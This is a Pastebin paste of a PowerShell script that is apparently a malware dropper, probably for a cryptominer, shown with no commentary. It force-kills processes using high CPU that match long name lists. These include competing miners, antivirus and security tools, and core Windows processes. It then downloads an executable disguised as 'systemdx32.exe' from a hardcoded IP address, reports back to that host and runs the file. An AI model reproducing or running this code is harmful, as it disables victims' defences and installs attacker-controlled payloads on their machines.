Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $counters = (Get-Counter '\Process(*)\% Processor Time').CounterSamples
- $malwares = "alm","vag_pag","office","pws_lotinfo_trans","aspnet_state","tasksvr","ekrn","iems","secscan","mysql","trustedinstaller","safedogsiteiis","write","360cleanhelper","sw_magik_gss","wd160session","smsservice","360rps","win1nit","npinst","xmrig","mrservicehost","360rp","hrate","xmr","laozi","csrs","postgres","csrv","safedogguardcenter","sl_gps_msg","javaservice","lsass","taskngr","dc","aipcopywlh64","xqjxke","sl_gps_rule","svhosts","qqexternal","streamserver","qv","sapstartsrv","avgcsrva","360se","alarmservice","nscpucnminer64","thunderplatform","xmrig32","ntrtscan","arp","a8service","msiexev","rsturboball","sl_join_bb808","ramdial","sl_upload809_1","beasvcx64","ptzproxyservice","connect","runtimebroker","system64","win1ogin","sql31","vmware","systemiissec","werfault","w3wp","snmpd","conhosts","taskhots","icrawlers_fbs_cjd","systmss","calcserviced","wmiprvser","bcompare","helppanc","memcached","qqpctray","see64","sl_join_srv","svchsot","reportengine","lms","winlogo","360tray","sppscv","nmsclient","mysqld","stest","apache","waterfox","teamviewer","mssql","mscorswv","jp2launcher","service","launch","tktbqi","mssys","taskhost","coiacy","networkmanager","systemtask","runtime","msmpeng","7za","reportingservicesservice","firefox","zhudongfangyu","wudfhost","javaw","mscl","lsmosee","cs","secury","db2syscs","xmr86","httpd","esetonlinescanner_enu","java","magserver","ravmond","chrome","serviceshost","update_windows","chinelada","system","carboniteservice","perl","ctsrvr","voipswitch","qqprotect","taskmgr","scope","vrmserver","wmiprvse","centralclient","csres","mcshield","mgmt","seccopy","wininits","decodeprocess","dvsvct","csrss","dvsvcs","update64","regsvr32","sl_gps_gpsserver","servicewatchdog","mininews","dllhost","msiexec","ntvdm","ivms","oneclickservice","cidaemon","spoolvs","cloudhelper","desktoplayer","conhost","messageserver","vshell","vag_stream","logon","powershell","svchosts3","servisce","vtdu","stream","process","svchost","qqpcnetflow","tomcat7","tomcat6","spoolsv","spectroserver","sceserver","filesearcherindex","tomcat8","sqlservr","mapa","nlbrute","360sdupd","winlogon","ccsvchst","csc","safedogtray","appserver","hpbsm_wde","ksmsvc","tkinstaller","calcclientgyd","smss","ns","mscorsvw","xmrig1","winlogin","qqpcrealtimespeedup","explorer","mscorswu","convert_imagemagick","win1ogins","qqpcrtp","nmsserver","oracle","winlnlts","svchostx","cms_controlclient","services","inteldevicemanager","iexplore","lsmose","frmweb","pag","dcserver","ggtbviewer","winlogan","cpuminer","minergate","cascade","wmiapsrv","nvidia","softupnotify","sl_gps_adapter"
- $malwares2 = "Silence","Carbon","xmrig32","nscpucnminer64","mrservicehost","servisce","svchosts3","svhosts","system64","systemiissec","taskhost","vrmserver","vshell","winlogan","winlogo","logon","win1nit","wininits","winlnlts","taskngr","tasksvr","mscl","cpuminer","sql31","taskhots","svchostx","xmr86","xmrig","xmr","win1ogin","win1ogins","ccsvchst","nscpucnminer64","update_windows"
- foreach ($counter in $counters) {
- if ($counter.CookedValue -ge 50) {
- if ($counter.InstanceName -eq "idle" -Or $counter.InstanceName -eq "_total") {
- continue
- }
- foreach ($malware in $malwares) {
- if ($counter.InstanceName -eq $malware) {
- Stop-Process -processname $counter.InstanceName -Force
- }
- }
- }
- foreach ($malware2 in $malwares2) {
- if ($counter.InstanceName -eq $malware2) {
- Stop-Process -processname $counter.InstanceName -Force
- }
- }
- }
- $SELF_COPY = "$HOME\readme.txt"
- $HSST = "http://191.101.180.84"
- $CALLBACK = $HSST
- $DEFAULT_RFILE = "$HSST/files/w/default"
- $OTHERS_RFILE = "$HSST/files/w/others"
- $LFILE_NAME = "systemdx32.exe"
- # $LFILE_PATH = "$env:TMP\$LFILE_NAME"
- # $LFILE_PATH = "$HOME\$LFILE_NAME"
- $LFILE_PATH = "$LFILE_NAME"
- $DOWNLOADER = New-Object System.Net.WebClient
- $SYSTEM_BIT = [System.IntPtr]::Size
- if ( $SYSTEM_BIT -eq 8 ) {
- $DOWNLOADER.DownloadFile($DEFAULT_RFILE, $LFILE_PATH)
- } else {
- $DOWNLOADER.DownloadFile($OTHERS_RFILE, $LFILE_PATH)
- }
- if ( !(Get-Process systemdx32 -ErrorAction SilentlyContinue) ) {
- $DOWNLOADER.DownloadString("$CALLBACK/?info=w0")
- cmd.exe /c $LFILE_PATH
- } else {
- $DOWNLOADER.DownloadString("$CALLBACK/?info=w9")
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement